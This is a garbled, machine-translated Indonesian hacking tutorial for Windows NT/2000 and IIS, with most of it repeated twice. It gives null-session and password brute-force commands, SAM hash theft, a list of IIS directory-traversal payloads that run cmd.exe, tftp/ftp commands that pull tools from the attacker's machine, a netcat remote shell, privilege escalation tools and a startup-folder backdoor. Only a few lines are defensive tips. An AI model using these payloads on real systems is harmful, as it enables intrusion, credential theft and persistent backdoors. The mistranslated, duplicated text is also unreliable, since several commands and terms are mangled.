Jika Anda menemukan port 135 dan 139 terbuka mesin mungkin NT/2k, jika 139 hanya terbuka itu mungkin Win9x. Jika 445 adalah mendengarkan itu jelas Win2k. Port 445 adalah sebuah alternatif untuk 139 tetapi orang-orang hanya menjalankan Win2k dan NT dengan service pack 6 akan dapat menggunakannya.
Netbios Netbios memungkinkan Anda untuk masuk ke saham (C $ D $ dll). Ini tidak membiarkan Anda menjalankan perintah tetapi tidak memberikan file akses sehingga Anda dapat meng-upload alat Anda sendiri. Jika Anda menjalankan sebuah file melalui netbios di mesin remote akan jalankan di komputer anda. Langkah pertama dalam netbios hacking adalah sesi null. Perintah ini ....
bersih menggunakan \ \ IPaddress \ IPC $ "" / user: ""
log anda sebagai dibangun di pengguna anonim (: / user: "") dengan tidak lulus ("") ke interprocess tersembunyi communictions saham (IPC $). Jika ini berfungsi, maka dimungkinkan untuk menghitung informasi jaringan, saham, kelompok pengguna dan mungkin bagian dari registri.
/ / Untuk mengamankan win2k/NT terhadap kerentanan ini memasukkan kunci registri
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ LSA
Nilai Nama RestrictAnonymous
Type REG_DWORD
Nilai 1 / /
Setelah koneksi null dibentuk perintah ..
bersih melihat IPaddress
dapat digunakan untuk mendapatkan daftar saham.
Alat terbaik untuk pekerjaan ini adalah tool baris perintah enum, ia menetapkan Facebook sesi null secara otomatis dan bisa mendapatkan banyak info.
Dapatkan dari http://razor.bindview.com/tools/index.shtml
Penggunaan: enum
[Switch] [hostname | ip] -U: mendapatkan Userlist -M: mendapatkan daftar mesin -N: dump namelist mendapatkan (berbeda-U |-M) -S: mendapatkan sharelist -P: mendapatkan password kebijakan informasi -G: mendapatkan daftar grup dan anggota -L: mendapatkan informasi kebijakan LSA -D: kamus retak, kebutuhan-u dan-f -D: menjadi lebih detail, berlaku untuk-U dan -S -C: tidak membatalkan sesi -U: menentukan username untuk digunakan (default "") -P: menentukan password untuk digunakan (default "") -F: tentukan dictfile untuk menggunakan (ingin-D)
Seperti yang anda lihat juga bisa melakukan remote menebak password pada user pada waktu melalui jaringan. Namun sebelum mencoba setiap serangan brute force adalah penting untuk memeriksa kebijakan password. Hal ini dapat diatur untuk mengunci account ke bawah setelah tertentu jumlah usaha login gagal (walaupun ini bukan konfigurasi default instalasi).
Untuk lebih fleksibel password cracking menyerang NetbiosAuditingTool (NAT) adalah pilihan yang baik. Dibutuhkan daftar nama pengguna
dan berlalu dan mencoba untuk terhubung dengan setiap kombinasi yang mungkin.
Penggunaan: nat [o-filename] [Userlist-u] [-p passlist] IPaddress
Jika Anda beruntung Anda dapat login dan peta berbagi ke hard drive anda dengan perintah ini.
net use x: \ \ IPaddress \ saham $ user "password" /: "username"
Peta ini akan berbagi ke komputer anda sebagai drive x.
/ / Untuk menonaktifkan saham Anda (dan port 139) goto alat Administrasi -> Layanan - Server> dan set ke disabled / /
Semua atau Tidak Administrator sangat penting dalam hacking NT karena seringkali hanya account yang bisa mendapatkan program dijalankan pada target jarak jauh. Dengan asumsi Anda menemukan lulus valid dari pengguna yang * tidak * milik grup Administrators (-G pilihan di enum)
Anda akan membutuhkan admin lulus. Cara tercepat untuk melakukan ini adalah untuk mendapatkan hash password dari file SAM dan menggunakan password cracker seperti Kain atau L0phterack. File SAM terkunci sedangkan OS up tetapi ada salinan cadangan sistem% root% \ Winnt \ repair. Jika Anda men-download ini dan pakan untuk L0phtCrack, mengaturnya agar serangan brute force alfanumerik dan Anda akan memiliki lulus dalam waktu kurang dari 24 jam (pada CPU 1 / 2 layak). Jika admin telah menggunakan sandi alfanumerik non itu bisa mengambil banyak lagi.
/ / Untuk mengamankan diri terhadap yang satu ini menggunakan serangan dari karakter non ASCII standar dengan menahan tombol ALT dan mengetikkan nomor 127-255 pada keypad. Ini akan foil L0phtCrack dan lain-lain;) / /
Jika file SAM cadangan telah dihapus Anda akan memiliki alat untuk meng-upload dan mencari cara lain untuk mengeksekusi mereka.
IIS sploits IIS memiliki banyak bug-nya luar biasa.
Untuk mempelajari lebih lanjut tentang kerentanan check out www.securityfocus.com dan www.packetstormsecurity.org.
Aku hanya akan menunjukkan kepada Anda bagaimana menggunakan mereka dan memberikan deskripsi singkat yang diambil dari berbagai sumber.
ASP Dot Bug Jika Anda menemukan file asp pada halaman tempat menjalankan IIS sebuah titik setelah asp di url seperti ini
www.website.com / direktori / file.asp.
Ini mungkin menunjukkan sumber dari file asp yang mungkin memiliki nama pengguna dan password keras dikodekan ke dalamnya.
Patch yang dirilis selama ini telah benar-benar menciptakan bug lain. Kali ini dengan menempatkan sebuah representasi hex dot sebelum asp hasil yang sama dapat dicapai.
www.website.com / direktori / file 2easp%
Nama berkas penanganan Bug CGI diambil dari www.securityfocus.com// / /
Karena adanya kelemahan dalam penanganan nama file CGI permintaan program, dimungkinkan untuk pengguna jarak jauh untuk mengeksekusi sewenang-wenang perintah pada host IIS.
Ketika IIS CGI menerima permintaan nama file, secara otomatis melakukan dua tindakan sebelum menyelesaikan permintaan. Pertama IIS decode nama file untuk menentukan filetype dan legitimasi file. IIS kemudian melakukan pemeriksaan keamanan. Setelah pemeriksaan keamanan selesai, IIS berlanjut dengan tindakan kedua yang melibatkan decoding parameter CGI. Sebuah cacat di IIS melibatkan tindakan tidak terdokumentasi ketiga: biasanya IIS hanya decode parameter CGI pada titik ini, namun sebelumnya nama file CGI decode decode keliru dua kali. Jika nama file cacat diajukan dan circumvents pemeriksaan keamanan awal, prosedur tidak berdokumen akan decode permintaan cacat, mungkin yang memungkinkan pelaksanaan perintah sewenang-wenang.
Perlu dicatat bahwa perintah sewenang-wenang akan dijalankan dengan hak istimewa account IUSR_machinename
catatan Ketika hacking IIS Anda mengeksekusi perintah sebagai webserver yang berarti Anda dibatasi oleh hak akses yang dimilikinya. Kita akan mendapatkan putaran ini nanti;) Namun itu berarti Anda hanya mungkin dapat membaca, menulis dan menjalankan beberapa file dalam beberapa direktori.
Ia juga mengatakan "kombinasi berbagai penyandian bawah Windows 2000 Server dan Profesional dapat menghasilkan hasil yang berbeda.". Pada dasarnya ini berarti Anda harus mencoba variasi sedikit berbeda sploit untuk menemukan satu yang akan bekerja dengan server.
Heres daftar variasi pada sploit yang sama bahwa semua akan menghasilkan direktori c: \ drive jika server rentan.
Anda menggunakan mereka dalam browser anda seperti ini ..
www.target.com/scripts/ ..% c0% af../winnt/system32/cmd.exe / c + dir + c: \
Anda juga bisa telnet ke port 80 dan masukkan mereka di sana dengan perintah GET.
GET / scripts / ..% c0% af../winnt/system32/cmd.exe / c + dir + c: \
Variasi pada tema / Msadc / ..% c0% af ../..% c0 af../winnt/system32/cmd.exe% / c + dir + c: \
/ _vti_bin / ..% C0% af ../..% c0% af ../..% c0 af../winnt/system32/cmd.exe% / c + dir + c: \
/ Iisadmpwd / ..% c0% af ../..% c0% af ../..% c0 af../winnt/system32/cmd.exe% / c + dir + c: \
/ ..% C0% af../winnt/system32/cmd.exe / c + dir + c: \
/ Scripts / ..% 255c ..% 255cwinnt/system32/cmd.exe / c + dir + c: \
/ Msadc / ..% 255c ..% 255c ..% 255c ..% 255cwinnt/system32/cmd.exe? / C + dir
? / _vti_bin 255c / ..% ..% 255c ..% 255c ..% 255c ..% 255c ..% 255cwinnt/system32/cmd.exe / c + dir + c: \
/ Iisadmpwd 255c ..% 255c / ..% ..% 255c ..% 255c ..% 255c ..% 255cwinnt/system32/cmd.exe / c + dir + c: \
/ ..% 255c ..% 255cwinnt/system32/cmd.exe / c + dir + c: \
..? / 252e scripts /% / 252e/winnt/system32/cmd.exe% / c + dir + c: \
/ 252e msadc /% / 252e% / 252e% / 252e/winnt/system32/cmd.exe% / c + dir + c:....? \
/ _vti_bin / 252e% / 252e% / 252e% / 252e/winnt/system32/cmd.exe% / c + dir + c:....? \
Jika server yang rentan terhadap salah satu dari ini maka Anda dapat menelusuri luar direktori webroot, jalankan file, melihat sumber file dan dengan bantuan dari klien TFTP diinstal pada NT secara default, upload file.
Nice;)
Untuk menjalankan perintah yang berbeda pada server Anda harus mengubah bit setelah
cmd.exe? / c +
Bila Anda perlu menggunakan ruang yang Anda gunakan +. Jika Anda ingin men-download file asp Anda akan mengubah perintah seperti ini, menggunakan perintah tipe DOS.
cmd.exe / c + type + c: \ inetpub \ scripts \ file.asp.
Anda dapat melakukan hal yang sama dengan semua file.
Untuk menyalin file yang akan anda lakukan ..
cmd.exe / c + copy + c: \ somefile + c: \ somedirectory \ somefile
Untuk menghapus
cmd.exe / c + del + c: \ somefile
dll, menjadi kreatif;)
Mengunggah Meng-upload sedikit lebih rumit. Pertama kita harus membuat sebuah daemon TFTP mendengarkan pada komputer kita. Untuk win32 orang, Anda bisa mendapatkan di sini
http://membres.tripod.fr/phjounin//zip/tftpd32d.zip
(Link ini mungkin mati pada saat Anda membaca ini google mencari TFTPD32 atau tftpd windows)
Unzip file ke dalam direktori anda akan meng-upload file dari dan melaksanakan server. Sekarang mendengarkan pada port UDP 69
pada komputer Anda. Sekarang Anda mengatakan webserver untuk mengeksekusi klien tftp pada target dan menggunakannya untuk mengambil file dari Anda kotak. Ini adalah perintah untuk melakukannya.
/ Cmd.exe / c + tftp +-i + YourIPaddress + GET + somefile.exe + C: \ somefile.exe
Ini upload somefile.exe ke c: \ drive dari target. Alamat IP Anda akan mulai bisa login sehingga langkah berisiko yang cantik. Pada bagian berikutnya saya akan menunjukkan Anda bagaimana untuk meng-upload tanpa meninggalkan IP Anda dalam log. Metode TFTP dapat bermanfaat jika mereka memiliki firewall tetapi UDP inbound diperbolehkan Check out c: \ file program untuk memastikan mereka tidak memiliki Anti Virus Software adalah juga merupakan ide bagus.
Menggunakan FTP untuk meng-upload alat-alat yang sedikit lebih rumit tetapi jauh lebih aman seperti yang Anda dont meninggalkan IP Anda dalam log, dengan asumsi menggunakan proxy, yang harus Anda BENAR! Masalah utama adalah bahwa kita harus menjalankan beberapa perintah untuk menggunakan FTP misalnya penebangan dalam mengubah direktori dll Untuk melakukan hal ini yang akan membuat script ftp di server dengan perintah masuk Namun hal pertama yang pertama. Goto mesin pencari yang menawarkan fasilitas FTP pencari seperti www.alltheweb.com. Kemudian lakukan FTP mencari alat apapun yang ingin Anda upload (mungkin netcat). Kemudian terhubung ke server itu, pastikan ia menerima login anonymous (user: ftp pass: ftp) dan mendapatkan direktori di mana netcat disimpan. Pastikan versi windows dengan pengujian keluar di komputer anda juga.
Sekarang untuk sedikit dingin, yang akan membuat sebuah file dengan perintah ftp di dalamnya dan kemudian mendapatkan klien ftp pada target untuk mengeksekusi script itu. Sekarang cara kita melakukan ini adalah dengan perintah echo dan pengalihan output. Ingatlah untuk menggunakan + untuk ruang bila mentransfer perintah-perintah ini ke browser
echo ftp.server.com ftpscript> terbuka> echo ftp user> ftpscript> echo lewat ftp> ftpscipt> echo cd / hackingtools>> ftpscript echo ftpscript>> biner echo mendapatkan> ftpscript nc> ftp-s: ftpscript
Uji keluar script pada kotak Anda sendiri terlebih dahulu untuk memastikan ia bekerja seperti yang Anda harapkan. Kemudian gunakan perintah ini pada browser Anda.
Jadi anda harus memiliki sesuatu seperti
www.target.com/scripts/ ..% c0% af../winnt/system32/cmd.exe? / c + ftpscript> echo + terbuka + ftp.server.com +> +
dll dll ..
Jika target memiliki firewall memblokir 21 TCP 20 TCP keluar dan masuk ini tidak akan bekerja.
Perintah Shell Sekarang kita upload netcat (untuk tidak dilihat sebagai virus oleh software AV yang paling) dan menggunakannya untuk membuat remote shell. Anda bisa mendapatkan netcat dari saya situs Operasi Newbie. http://newbie.at/newbieops
Perintah pada mesin Anda akan nc-L-d-e cmd.exe-p 8080. Seharusnya terlihat seperti ini di browser Anda.
/ Cmd.exe? / C + nc +-L +-d +-e + cmd.exe +-p 8080
Ini memberitahu webserver untuk menjalankan netcat dengan
-Persistent di istirahat beberapa sambungan L.
-D dalam mode siluman,
-E cmd.exe cmd.exe peluncuran
-P menentukan port untuk mendengarkan pada. Kemudian kita terhubung melalui telnet ke port 8080.
telnet IPaddress 8080
Kami sekarang memiliki perintah shell. Jika ini doesnt work mungkin ada firewall atau menghentikan paket filter untuk menghubungkan ke pelabuhan. Coba 25,53 atau 80 seperti yang sering diperbolehkan.
Privilege Eskalasi Sekarang Anda memiliki akses dengan hak akses dari webserver yang Anda butuhkan admin. Jika mesin NT pre-service pack 6 ini bisa dilakukan dengan salah satu dari 3 alat Im akan menunjukkan kepada Anda. Jika Win2k nya kita akan membahas 2 cara untuk mendapatkan hash password setelah bahwa kita akan menanam sebuah backdoor.
Untuk mendapatkan admin cepat pada NT Anda bisa menggunakan Getadmin atau sechole. Ini akan menambah webserver ke Administrator kelompok. Namun yang tidak sangat diam-diam sehingga metode yang lebih baik adalah untuk mendapatkan HK. Hal ini akan menjalankan perintah individu sebagai Administrator tanpa mengubah konfigurasi mesin.
Penggunaan:
hk perintah
atau
Getadmin Username
atau
Sechole username
www.nmrc.org/files/nt/ <------------- download HK sini
www.users.globalnet.co.uk/ ~ mnemonix / utils.htm <----- GetAdmin + Sechole sini
Jika Anda berurusan dengan Win2k Anda akan perlu untuk mendapatkan hash password dan retak mereka. Salah satu cara adalah dengan menggunakan tftp (Pada target) untuk mengirim file SAM cadangan untuk Anda sehingga Anda dapat memecahkannya dengan L0phtCrack. Salah satu kemungkinan adalah bahwa admin mungkin telah berubah sejak lulus instalasi, jika ia memiliki cadangan sam akan keluar tanggal. Namun Anda dapat memperbaruinya dengan meng-upload utilitas rdisk (Anda dapat menemukannya di suatu tempat di situs M $ s ') dan mengeksekusi perintah ini rdisk.exe / s. Setelah selesai Anda perlu memperluas sam._ file dengan perintah ini
memperluas c: \ winnt \ repair \ sam, sam _
Lalu mengirim file SAM diperluas ke kotak Anda dan memasukkannya ke dalam L0phtCrack.
Cara alternatif untuk mendapatkan hash masuk ke L0phtCrack adalah menggunakan pwdump2 dan pipa output ke textfile kemudian memberikan bahwa untuk L0phtCrack. Namun pwdump2 memerlukan hak administrator! Jadi kita mengalami situasi ayam dan telur. Salah satu cara untuk
mendapatkan putaran ini adalah dengan menempatkan sebuah file batch dengan perintah pwdump2 ke folder startup admin atau folder startup allusers. Kemudian setelah seseorang dengan hak istimewa admin log pada file teks akan berada di sana menunggu untuk Anda! Pastikan Anda memasang "@ echo off" (minus tanda kutip) di file batch sehingga doesnt muncul ketika menjalankan nya
Lsadump2 adalah alat lain yang mungkin berguna pada Win2k tetapi juga perlu privilese admin Ini sebenarnya dumps plaintext berlalu dari registri. ouput ini kacau tapi Anda kadang-kadang bisa melihat kombinasi username dengan password di bawahnya.
(Huruf akan dipisahkan oleh titik).
Download pwdump2 dan 2 lsadump dari sini.
http://razor.bindview.com/tools/index.shtml
Cepat Backdoor Pada jendela folder default 2000 pengguna startup terletak di
c: \ Documents and Settings \ username \ Start Menu \ Programs \ Startup
netcat asumsi yang kita miliki dalam c: \ Anda bisa memasukkan sebuah file batch (bat.) dengan perintah netcat yang sebelumnya kita gunakan
c: \ nc-L-d-e cmd.exe-p 8080
Ini akan memulai pendengar netcat pada 8080 setiap kali boot server. Ingatlah untuk membunuh dari pendengar surplus teratur dengan perintah kill.exe (Anda mungkin perlu men-download ini dari situs sumber kit NT online FTP.
Nah Im capek sekarang, harap Anda menikmati itu orang, tetap memilih untuk kita dan terus belajar. Kami akan terus menghasilkan yang terbaik
hal kita bisa.
Netbios Netbios memungkinkan Anda untuk masuk ke saham (C $ D $ dll). Ini tidak membiarkan Anda menjalankan perintah tetapi tidak memberikan file akses sehingga Anda dapat meng-upload alat Anda sendiri. Jika Anda menjalankan sebuah file melalui netbios di mesin remote akan jalankan di komputer anda. Langkah pertama dalam netbios hacking adalah sesi null. Perintah ini ....
bersih menggunakan \ \ IPaddress \ IPC $ "" / user: ""
log anda sebagai dibangun di pengguna anonim (: / user: "") dengan tidak lulus ("") ke interprocess tersembunyi communictions saham (IPC $). Jika ini berfungsi, maka dimungkinkan untuk menghitung informasi jaringan, saham, kelompok pengguna dan mungkin bagian dari registri.
/ / Untuk mengamankan win2k/NT terhadap kerentanan ini memasukkan kunci registri
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ LSA
Nilai Nama RestrictAnonymous
Type REG_DWORD
Nilai 1 / /
Setelah koneksi null dibentuk perintah ..
bersih melihat IPaddress
dapat digunakan untuk mendapatkan daftar saham.
Alat terbaik untuk pekerjaan ini adalah tool baris perintah enum, ia menetapkan Facebook sesi null secara otomatis dan bisa mendapatkan banyak info.
Dapatkan dari http://razor.bindview.com/tools/index.shtml
Penggunaan: enum
[Switch] [hostname | ip] -U: mendapatkan Userlist -M: mendapatkan daftar mesin -N: dump namelist mendapatkan (berbeda-U |-M) -S: mendapatkan sharelist -P: mendapatkan password kebijakan informasi -G: mendapatkan daftar grup dan anggota -L: mendapatkan informasi kebijakan LSA -D: kamus retak, kebutuhan-u dan-f -D: menjadi lebih detail, berlaku untuk-U dan -S -C: tidak membatalkan sesi -U: menentukan username untuk digunakan (default "") -P: menentukan password untuk digunakan (default "") -F: tentukan dictfile untuk menggunakan (ingin-D)
Seperti yang anda lihat juga bisa melakukan remote menebak password pada user pada waktu melalui jaringan. Namun sebelum mencoba setiap serangan brute force adalah penting untuk memeriksa kebijakan password. Hal ini dapat diatur untuk mengunci account ke bawah setelah tertentu jumlah usaha login gagal (walaupun ini bukan konfigurasi default instalasi).
Untuk lebih fleksibel password cracking menyerang NetbiosAuditingTool (NAT) adalah pilihan yang baik. Dibutuhkan daftar nama pengguna
dan berlalu dan mencoba untuk terhubung dengan setiap kombinasi yang mungkin.
Penggunaan: nat [o-filename] [Userlist-u] [-p passlist] IPaddress
Jika Anda beruntung Anda dapat login dan peta berbagi ke hard drive anda dengan perintah ini.
net use x: \ \ IPaddress \ saham $ user "password" /: "username"
Peta ini akan berbagi ke komputer anda sebagai drive x.
/ / Untuk menonaktifkan saham Anda (dan port 139) goto alat Administrasi -> Layanan - Server> dan set ke disabled / /
Semua atau Tidak Administrator sangat penting dalam hacking NT karena seringkali hanya account yang bisa mendapatkan program dijalankan pada target jarak jauh. Dengan asumsi Anda menemukan lulus valid dari pengguna yang * tidak * milik grup Administrators (-G pilihan di enum)
Anda akan membutuhkan admin lulus. Cara tercepat untuk melakukan ini adalah untuk mendapatkan hash password dari file SAM dan menggunakan password cracker seperti Kain atau L0phterack. File SAM terkunci sedangkan OS up tetapi ada salinan cadangan sistem% root% \ Winnt \ repair. Jika Anda men-download ini dan pakan untuk L0phtCrack, mengaturnya agar serangan brute force alfanumerik dan Anda akan memiliki lulus dalam waktu kurang dari 24 jam (pada CPU 1 / 2 layak). Jika admin telah menggunakan sandi alfanumerik non itu bisa mengambil banyak lagi.
/ / Untuk mengamankan diri terhadap yang satu ini menggunakan serangan dari karakter non ASCII standar dengan menahan tombol ALT dan mengetikkan nomor 127-255 pada keypad. Ini akan foil L0phtCrack dan lain-lain;) / /
Jika file SAM cadangan telah dihapus Anda akan memiliki alat untuk meng-upload dan mencari cara lain untuk mengeksekusi mereka.
IIS sploits IIS memiliki banyak bug-nya luar biasa.
Untuk mempelajari lebih lanjut tentang kerentanan check out www.securityfocus.com dan www.packetstormsecurity.org.
Aku hanya akan menunjukkan kepada Anda bagaimana menggunakan mereka dan memberikan deskripsi singkat yang diambil dari berbagai sumber.
ASP Dot Bug Jika Anda menemukan file asp pada halaman tempat menjalankan IIS sebuah titik setelah asp di url seperti ini
www.website.com / direktori / file.asp.
Ini mungkin menunjukkan sumber dari file asp yang mungkin memiliki nama pengguna dan password keras dikodekan ke dalamnya.
Patch yang dirilis selama ini telah benar-benar menciptakan bug lain. Kali ini dengan menempatkan sebuah representasi hex dot sebelum asp hasil yang sama dapat dicapai.
www.website.com / direktori / file 2easp%
Nama berkas penanganan Bug CGI diambil dari www.securityfocus.com// / /
Karena adanya kelemahan dalam penanganan nama file CGI permintaan program, dimungkinkan untuk pengguna jarak jauh untuk mengeksekusi sewenang-wenang perintah pada host IIS.
Ketika IIS CGI menerima permintaan nama file, secara otomatis melakukan dua tindakan sebelum menyelesaikan permintaan. Pertama IIS decode nama file untuk menentukan filetype dan legitimasi file. IIS kemudian melakukan pemeriksaan keamanan. Setelah pemeriksaan keamanan selesai, IIS berlanjut dengan tindakan kedua yang melibatkan decoding parameter CGI. Sebuah cacat di IIS melibatkan tindakan tidak terdokumentasi ketiga: biasanya IIS hanya decode parameter CGI pada titik ini, namun sebelumnya nama file CGI decode decode keliru dua kali. Jika nama file cacat diajukan dan circumvents pemeriksaan keamanan awal, prosedur tidak berdokumen akan decode permintaan cacat, mungkin yang memungkinkan pelaksanaan perintah sewenang-wenang.
Perlu dicatat bahwa perintah sewenang-wenang akan dijalankan dengan hak istimewa account IUSR_machinename
catatan Ketika hacking IIS Anda mengeksekusi perintah sebagai webserver yang berarti Anda dibatasi oleh hak akses yang dimilikinya. Kita akan mendapatkan putaran ini nanti;) Namun itu berarti Anda hanya mungkin dapat membaca, menulis dan menjalankan beberapa file dalam beberapa direktori.
Ia juga mengatakan "kombinasi berbagai penyandian bawah Windows 2000 Server dan Profesional dapat menghasilkan hasil yang berbeda.". Pada dasarnya ini berarti Anda harus mencoba variasi sedikit berbeda sploit untuk menemukan satu yang akan bekerja dengan server.
Heres daftar variasi pada sploit yang sama bahwa semua akan menghasilkan direktori c: \ drive jika server rentan.
Anda menggunakan mereka dalam browser anda seperti ini ..
www.target.com/scripts/ ..% c0% af../winnt/system32/cmd.exe / c + dir + c: \
Anda juga bisa telnet ke port 80 dan masukkan mereka di sana dengan perintah GET.
GET / scripts / ..% c0% af../winnt/system32/cmd.exe / c + dir + c: \
Variasi pada tema / Msadc / ..% c0% af ../..% c0 af../winnt/system32/cmd.exe% / c + dir + c: \
/ _vti_bin / ..% C0% af ../..% c0% af ../..% c0 af../winnt/system32/cmd.exe% / c + dir + c: \
/ Iisadmpwd / ..% c0% af ../..% c0% af ../..% c0 af../winnt/system32/cmd.exe% / c + dir + c: \
/ ..% C0% af../winnt/system32/cmd.exe / c + dir + c: \
/ Scripts / ..% 255c ..% 255cwinnt/system32/cmd.exe / c + dir + c: \
/ Msadc / ..% 255c ..% 255c ..% 255c ..% 255cwinnt/system32/cmd.exe? / C + dir
? / _vti_bin 255c / ..% ..% 255c ..% 255c ..% 255c ..% 255c ..% 255cwinnt/system32/cmd.exe / c + dir + c: \
/ Iisadmpwd 255c ..% 255c / ..% ..% 255c ..% 255c ..% 255c ..% 255cwinnt/system32/cmd.exe / c + dir + c: \
/ ..% 255c ..% 255cwinnt/system32/cmd.exe / c + dir + c: \
..? / 252e scripts /% / 252e/winnt/system32/cmd.exe% / c + dir + c: \
/ 252e msadc /% / 252e% / 252e% / 252e/winnt/system32/cmd.exe% / c + dir + c:....? \
/ _vti_bin / 252e% / 252e% / 252e% / 252e/winnt/system32/cmd.exe% / c + dir + c:....? \
Jika server yang rentan terhadap salah satu dari ini maka Anda dapat menelusuri luar direktori webroot, jalankan file, melihat sumber file dan dengan bantuan dari klien TFTP diinstal pada NT secara default, upload file.
Nice;)
Untuk menjalankan perintah yang berbeda pada server Anda harus mengubah bit setelah
cmd.exe? / c +
Bila Anda perlu menggunakan ruang yang Anda gunakan +. Jika Anda ingin men-download file asp Anda akan mengubah perintah seperti ini, menggunakan perintah tipe DOS.
cmd.exe / c + type + c: \ inetpub \ scripts \ file.asp.
Anda dapat melakukan hal yang sama dengan semua file.
Untuk menyalin file yang akan anda lakukan ..
cmd.exe / c + copy + c: \ somefile + c: \ somedirectory \ somefile
Untuk menghapus
cmd.exe / c + del + c: \ somefile
dll, menjadi kreatif;)
Mengunggah Meng-upload sedikit lebih rumit. Pertama kita harus membuat sebuah daemon TFTP mendengarkan pada komputer kita. Untuk win32 orang, Anda bisa mendapatkan di sini
http://membres.tripod.fr/phjounin//zip/tftpd32d.zip
(Link ini mungkin mati pada saat Anda membaca ini google mencari TFTPD32 atau tftpd windows)
Unzip file ke dalam direktori anda akan meng-upload file dari dan melaksanakan server. Sekarang mendengarkan pada port UDP 69
pada komputer Anda. Sekarang Anda mengatakan webserver untuk mengeksekusi klien tftp pada target dan menggunakannya untuk mengambil file dari Anda kotak. Ini adalah perintah untuk melakukannya.
/ Cmd.exe / c + tftp +-i + YourIPaddress + GET + somefile.exe + C: \ somefile.exe
Ini upload somefile.exe ke c: \ drive dari target. Alamat IP Anda akan mulai bisa login sehingga langkah berisiko yang cantik. Pada bagian berikutnya saya akan menunjukkan Anda bagaimana untuk meng-upload tanpa meninggalkan IP Anda dalam log. Metode TFTP dapat bermanfaat jika mereka memiliki firewall tetapi UDP inbound diperbolehkan Check out c: \ file program untuk memastikan mereka tidak memiliki Anti Virus Software adalah juga merupakan ide bagus.
Menggunakan FTP untuk meng-upload alat-alat yang sedikit lebih rumit tetapi jauh lebih aman seperti yang Anda dont meninggalkan IP Anda dalam log, dengan asumsi menggunakan proxy, yang harus Anda BENAR! Masalah utama adalah bahwa kita harus menjalankan beberapa perintah untuk menggunakan FTP misalnya penebangan dalam mengubah direktori dll Untuk melakukan hal ini yang akan membuat script ftp di server dengan perintah masuk Namun hal pertama yang pertama. Goto mesin pencari yang menawarkan fasilitas FTP pencari seperti www.alltheweb.com. Kemudian lakukan FTP mencari alat apapun yang ingin Anda upload (mungkin netcat). Kemudian terhubung ke server itu, pastikan ia menerima login anonymous (user: ftp pass: ftp) dan mendapatkan direktori di mana netcat disimpan. Pastikan versi windows dengan pengujian keluar di komputer anda juga.
Sekarang untuk sedikit dingin, yang akan membuat sebuah file dengan perintah ftp di dalamnya dan kemudian mendapatkan klien ftp pada target untuk mengeksekusi script itu. Sekarang cara kita melakukan ini adalah dengan perintah echo dan pengalihan output. Ingatlah untuk menggunakan + untuk ruang bila mentransfer perintah-perintah ini ke browser
echo ftp.server.com ftpscript> terbuka> echo ftp user> ftpscript> echo lewat ftp> ftpscipt> echo cd / hackingtools>> ftpscript echo ftpscript>> biner echo mendapatkan> ftpscript nc> ftp-s: ftpscript
Uji keluar script pada kotak Anda sendiri terlebih dahulu untuk memastikan ia bekerja seperti yang Anda harapkan. Kemudian gunakan perintah ini pada browser Anda.
Jadi anda harus memiliki sesuatu seperti
www.target.com/scripts/ ..% c0% af../winnt/system32/cmd.exe? / c + ftpscript> echo + terbuka + ftp.server.com +> +
dll dll ..
Jika target memiliki firewall memblokir 21 TCP 20 TCP keluar dan masuk ini tidak akan bekerja.
Perintah Shell Sekarang kita upload netcat (untuk tidak dilihat sebagai virus oleh software AV yang paling) dan menggunakannya untuk membuat remote shell. Anda bisa mendapatkan netcat dari saya situs Operasi Newbie. http://newbie.at/newbieops
Perintah pada mesin Anda akan nc-L-d-e cmd.exe-p 8080. Seharusnya terlihat seperti ini di browser Anda.
/ Cmd.exe? / C + nc +-L +-d +-e + cmd.exe +-p 8080
Ini memberitahu webserver untuk menjalankan netcat dengan
-Persistent di istirahat beberapa sambungan L.
-D dalam mode siluman,
-E cmd.exe cmd.exe peluncuran
-P menentukan port untuk mendengarkan pada. Kemudian kita terhubung melalui telnet ke port 8080.
telnet IPaddress 8080
Kami sekarang memiliki perintah shell. Jika ini doesnt work mungkin ada firewall atau menghentikan paket filter untuk menghubungkan ke pelabuhan. Coba 25,53 atau 80 seperti yang sering diperbolehkan.
Privilege Eskalasi Sekarang Anda memiliki akses dengan hak akses dari webserver yang Anda butuhkan admin. Jika mesin NT pre-service pack 6 ini bisa dilakukan dengan salah satu dari 3 alat Im akan menunjukkan kepada Anda. Jika Win2k nya kita akan membahas 2 cara untuk mendapatkan hash password setelah bahwa kita akan menanam sebuah backdoor.
Untuk mendapatkan admin cepat pada NT Anda bisa menggunakan Getadmin atau sechole. Ini akan menambah webserver ke Administrator kelompok. Namun yang tidak sangat diam-diam sehingga metode yang lebih baik adalah untuk mendapatkan HK. Hal ini akan menjalankan perintah individu sebagai Administrator tanpa mengubah konfigurasi mesin.
Penggunaan:
hk perintah
atau
Getadmin Username
atau
Sechole username
www.nmrc.org/files/nt/ <------------- download HK sini
www.users.globalnet.co.uk/ ~ mnemonix / utils.htm <----- GetAdmin + Sechole sini
Jika Anda berurusan dengan Win2k Anda akan perlu untuk mendapatkan hash password dan retak mereka. Salah satu cara adalah dengan menggunakan tftp (Pada target) untuk mengirim file SAM cadangan untuk Anda sehingga Anda dapat memecahkannya dengan L0phtCrack. Salah satu kemungkinan adalah bahwa admin mungkin telah berubah sejak lulus instalasi, jika ia memiliki cadangan sam akan keluar tanggal. Namun Anda dapat memperbaruinya dengan meng-upload utilitas rdisk (Anda dapat menemukannya di suatu tempat di situs M $ s ') dan mengeksekusi perintah ini rdisk.exe / s. Setelah selesai Anda perlu memperluas sam._ file dengan perintah ini
memperluas c: \ winnt \ repair \ sam, sam _
Lalu mengirim file SAM diperluas ke kotak Anda dan memasukkannya ke dalam L0phtCrack.
Cara alternatif untuk mendapatkan hash masuk ke L0phtCrack adalah menggunakan pwdump2 dan pipa output ke textfile kemudian memberikan bahwa untuk L0phtCrack. Namun pwdump2 memerlukan hak administrator! Jadi kita mengalami situasi ayam dan telur. Salah satu cara untuk
mendapatkan putaran ini adalah dengan menempatkan sebuah file batch dengan perintah pwdump2 ke folder startup admin atau folder startup allusers. Kemudian setelah seseorang dengan hak istimewa admin log pada file teks akan berada di sana menunggu untuk Anda! Pastikan Anda memasang "@ echo off" (minus tanda kutip) di file batch sehingga doesnt muncul ketika menjalankan nya
Lsadump2 adalah alat lain yang mungkin berguna pada Win2k tetapi juga perlu privilese admin Ini sebenarnya dumps plaintext berlalu dari registri. ouput ini kacau tapi Anda kadang-kadang bisa melihat kombinasi username dengan password di bawahnya.
(Huruf akan dipisahkan oleh titik).
Download pwdump2 dan 2 lsadump dari sini.
